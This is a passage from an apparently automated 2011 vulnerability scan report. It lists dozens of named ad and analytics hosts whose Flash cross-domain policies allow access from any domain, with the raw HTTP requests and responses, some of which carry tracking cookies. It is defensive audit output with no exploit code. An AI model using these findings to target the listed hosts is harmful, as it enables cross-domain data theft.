Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3801752829"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sun, 04 Sep 2011 01:10:56 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

6.39. http://load.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313195660000"
Last-Modified: Sat, 13 Aug 2011 00:34:20 GMT
host: rcv-srv34
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.40. http://log.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: Keep-Alive
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.41. http://metrics.sprint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.42. http://motifcdn2.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://motifcdn2.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: motifcdn2.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2179194/HYSA_Champion_Asterisk_300x250_30k.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852"
Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Vary: Accept-Encoding
Content-Length: 339
Date: Sun, 04 Sep 2011 00:43:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:26 GMT
Server: Omniture DC/2.0.0
xserver: www28
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.44. http://odb.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.45. http://p.brilig.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:45:29 GMT
ETag: "55fb1-ab-4a86245412040"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=75
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>


6.46. http://paid.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:23:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.47. http://pbid.pro-market.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
ETag: W/"207-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: application/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:10:59 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.48. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.49. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:06 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.50. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.51. http://premium.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.52. http://qlog.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://qlog.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; rtbData0="key=tidaltv:value=dd4e867c-c693-47de-91e1-d466af06b7be:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: Keep-Alive
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.53. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:06:01 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:06:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv48.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rcv-srv48.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:28:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.55. http://receive.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314196443000"
Last-Modified: Wed, 24 Aug 2011 14:34:03 GMT
host: rcv-srv17
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.56. http://redir.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://redir.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: redir.adap.tv

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c4eab00cd774ab5a7cc17b4370cc452:1314901110"
Last-Modified: Thu, 01 Sep 2011 18:18:30 GMT
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:28 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-po
...[SNIP]...

6.57. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:16:31 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5295
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.58. http://s3.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.cinesport.com

Response

HTTP/1.1 200 OK
x-amz-id-2: HJPWt1++478t1MkKTXsRWRAZcqPlaICP21rPc6XhuXcwNUsultrjb1lWrGlrIox4
x-amz-request-id: 832C78F5B320E530
Date: Sun, 04 Sep 2011 01:03:57 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.59. http://search.spotxchange.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "c41e69-8b-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 139
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.60. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.61. http://segments.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segments.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.62. http://simg.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://simg.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: simg.zedo.com

Response

HTTP/1.0 200 OK
Age: 0
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:11 GMT
Edge-Control: dca=esi
ETag: "32e623-f7-44d91a42f42c0"
Last-Modified: Mon, 19 May 2008 09:03:47 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ZEDO 3G
Content-Length: 247
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.63. https://socialize.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web503
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:24:16 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.64. http://sprint.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sprint.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:45:31 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.65. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:18 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.66. http://studio-5.financialcontent.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: studio-5.financialcontent.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:19 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sun, 04 Sep 2011 01:24:19 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

